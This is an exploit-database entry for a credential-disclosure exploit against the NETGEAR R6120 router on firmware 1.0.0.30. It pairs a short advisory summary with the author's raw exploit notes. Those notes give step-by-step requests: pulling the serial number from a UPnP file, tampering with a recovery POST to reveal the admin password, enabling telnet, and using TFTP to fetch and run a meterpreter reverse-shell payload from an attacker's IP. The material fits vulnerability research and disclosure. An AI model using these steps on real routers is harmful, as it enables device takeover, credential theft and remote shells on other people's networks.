header-logo
Suggest Exploit
vendor:
R6120
by:
Wadeek
8.8
CVSS
HIGH
Credential Disclosure
200
CWE
Product Name: R6120
Affected Version From: 1.0.0.30
Affected Version To: 1.0.0.30
Patch Exists: YES
Related CWE: N/A
CPE: h:netgear:r6120
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux, MIPSLE
2018

NETGEAR WiFi Router R6120 – Credential Disclosure

An authenticated Telnet command execution vulnerability exists in NETGEAR WiFi Router R6120 with firmware version 1.0.0.30. An attacker can exploit this vulnerability by sending a POST request to http://192.168.1.1/401_recovery.htm with the serial number of the router. This will bypass the security questions and allow the attacker to gain access to the router admin username and password. The attacker can then use the credentials to telnet into the router and execute commands.

Mitigation:

Users should update their router firmware to the latest version available from the vendor.
Source

Exploit-DB raw data:

# Exploit Title: NETGEAR WiFi Router R6120 - Credential Disclosure
# Date: 2018-10-28
# Exploit Author: Wadeek
# Hardware Version: R6120
# Firmware Version: 1.0.0.30
# Vendor Homepage: https://www.netgear.com/support/product/R6120.aspx
# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6120/R6120-V1.0.0.30.zip

# == Files Containing Juicy Info ==
>> http://192.168.1.1:56688/rootDesc.xml (Server:  Unspecified, UPnP/1.0, Unspecified)
<serialNumber>SSSSSSSNNNNNN</serialNumber>

# == Security Questions Bypass > Password Disclosure ==
>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
<POST REQUEST>
htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
(replace)
dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
(by)
dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=passwordrecovered.htm&SID=
<POST RESPONSE>
">You have successfully recovered the admin password.</span>
">Router Admin Username</span>:&nbsp;admin</td>
">Router Admin Password</span>:&nbsp;Str0ng+-Passw0rd</td>

# == Authenticated Telnet Command Execution ==
>> http://admin:Str0ng+-Passw0rd@192.168.1.1/setup.cgi?todo=debug
:~$ telnet 192.168.1.1
R6120 login: admin
Password: Str0ng+-Passw0rd
{
upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
}

Navigation

Suggest Exploit

Services By CQR